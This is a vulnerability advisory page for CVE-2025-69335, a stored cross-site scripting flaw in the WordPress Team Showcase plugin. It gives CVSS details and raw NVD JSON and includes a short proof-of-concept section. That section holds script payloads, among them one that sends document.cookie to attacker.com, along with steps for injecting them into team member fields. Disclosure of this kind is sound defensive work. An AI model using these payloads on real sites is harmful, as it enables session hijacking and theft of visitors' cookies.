Security Vulnerability Report
中文
CVE-2025-69335 CVSS 6.5 MEDIUM

CVE-2025-69335

Published: 2026-01-06 17:15:46
Last Modified: 2026-04-27 21:16:24

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Team Showcase team-showcase allows Stored XSS.This issue affects Team Showcase: from n/a through <= 2.9.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Team Showcase <= 2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69335 Stored XSS PoC for Team Showcase Plugin --> <!-- Inject this payload in any team member field (name, role, bio, etc.) --> <script>alert(document.cookie)</script> <!-- Or more sophisticated payload to steal cookies --> <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> <!-- XSS payload using event handler --> <svg onload=alert('XSS')> <!-- PoC explanation: --> <!-- 1. Go to Team Showcase plugin admin panel --> <!-- 2. Add new team member or edit existing one --> <!-- 3. Paste the XSS payload in any text field (name, role, description) --> <!-- 4. Save the team member --> <!-- 5. Visit the public team showcase page --> <!-- 6. The XSS payload will execute in the victim's browser -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69335", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:46.323", "lastModified": "2026-04-27T21:16:24.160", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Team Showcase team-showcase allows Stored XSS.This issue affects Team Showcase: from n/a through <= 2.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/team-showcase/vulnerability/wordpress-team-showcase-plugin-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}